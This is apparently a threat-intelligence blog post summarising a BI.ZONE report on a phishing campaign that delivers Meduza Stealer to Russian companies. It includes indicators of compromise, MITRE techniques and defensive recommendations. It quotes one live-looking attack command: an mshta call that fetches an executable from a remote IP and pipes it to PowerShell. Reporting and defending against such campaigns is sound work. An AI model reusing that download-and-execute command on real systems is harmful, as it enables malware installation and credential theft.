Meduza Stealer Targets Russian Companies via Phishing Campaigns

On August 2024, BI.ZONE released a detailed report revealing increased phishing attacks leveraging the Meduza Stealer malware to target Russian organizations.

Meduza Stealer Targets Russian Companies via Phishing Campaigns
The original image was generated by OpenAI's DALL-E and edited by the author. Source: OpenAI (September 2024)

Introduction

On August 2024, BI.ZONE released a detailed report revealing increased phishing attacks leveraging the Meduza Stealer malware to target Russian organizations. The attackers, identified as part of a threat cluster known as "Stone Wolf," exploited the reputation of legitimate industrial automation companies to trick users into downloading malicious payloads.

Report Overview

Stone Wolf's malicious campaign began by disseminating phishing emails that looked legitimate communication from well-known industrial automation providers. These emails contained an archive named "Dostavka_Promautomatic.zip," which, when opened, revealed a combination of legitimate and malicious files, including a digital signature (.p7s file) and a decoy document (.docx). Alongside these was a malicious URL file, "Scan_127-05_24_dostavka_13.05.2024.pdf.url," which led to the deployment of the Meduza Stealer malware.

Phishing attacks relying on recognizable brands and logos remain highly effective. These visual cues establish trust with unsuspecting users, making them more likely to engage with malicious content. Stone Wolf's use of industrial providers as the cover for their attacks capitalizes on this vulnerability.

Once the malicious link is accessed, the attack loads a file from a remote SMB server. A Windows shortcut file triggers a command involving PowerShell:

SyncAppvPublishingServer.vbs ; mshta http://193.124.33[.]71:3217/Scan_127-05_24_dostavka_13.05.2024.exe | powershell -

This command downloads and executes an HTA file, which, in turn, executes an AES-encrypted payload through PowerShell. The payload downloads additional malware components from the same remote network, ultimately leading to Meduza Stealer's installation.

Meduza Stealer is a commercial malware-as-a-service tool that first surfaced on underground forums in June 2023. Available for purchase through subscription models, it offers cybercriminals access to a web panel that tracks the data collected from infected systems, despite claims that Meduza Stealer's executable contains an anti-CIS module designed to avoid Russian targets, BI. ZONE's sample of the malware demonstrated no such restrictions.

Upon successful execution, Meduza Stealer collects a wide array of information, including:

  • Operating system details
  • IP address and screen snapshots
  • Credentials from browsers (e.g., Chrome, Edge, Yandex)
  • Password manager data (e.g., 1Password, NordPass)
  • Cryptographic wallet credentials
  • Windows Credential Manager and Windows Vault data

The malware also retrieves session data from communication tools like Telegram and Discord, along with Steam tokens. This collected data is transmitted to a command and control (C2) server for the attacker's use.

Insights and Analysis

BI. ZONE's report stresses the importance of user awareness and regular cybersecurity training to combat phishing attempts. The following preventative measures are recommended:

  • Regularly train employees to recognize phishing techniques, especially those using trusted brands to establish credibility.
  • Implement robust email filtering systems to block malicious attachments and links.
  • Utilize endpoint detection and response (EDR) solutions with specific rules to detect abnormal MSHTA or PowerShell activities.

By leveraging trusted brands and delivering highly potent malware like Meduza Stealer, attackers continue to pose significant threats to organizations globally. Regularly updating detection systems and maintaining awareness of phishing techniques is crucial to minimizing the risks associated with such attacks.

Indicators of Compromise (IOCs)

IndicatorTypeDescription
cd745ddc3f772137945a1ed3343765f178491f495a2f3af0ba7c4bd97ca4bca0HashFile hash related to malicious activity involving Meduza Stealer
864cbc0ec0418da6bb14d95713994eb0f38be289c3c7883bde51a9f1408d06bbHashFile hash associated with Meduza Stealer campaign
193.124.33[.]71IPRemote network location involved in hosting and distributing Meduza Stealer payload
109.120.177[.]48IPAdditional IP address used for malware command and control

MITRE ATT&CK Techniques

TacticTechniqueIDDescription
ExecutionCommand and Scripting InterpreterT1059.001PowerShell used to execute malicious scripts and download payloads
ExecutionSystem Binary Proxy ExecutionT1218.005MSHTA leveraged to execute HTML Application files remotely
ExfiltrationApplication Layer ProtocolT1071.001Use of web protocols to exfiltrate data from infected machines

References

Stone Wolf employs Meduza Stealer to hack Russian companies
A new cluster of activity abuses a legitimate brand to spearphish for credentials and system data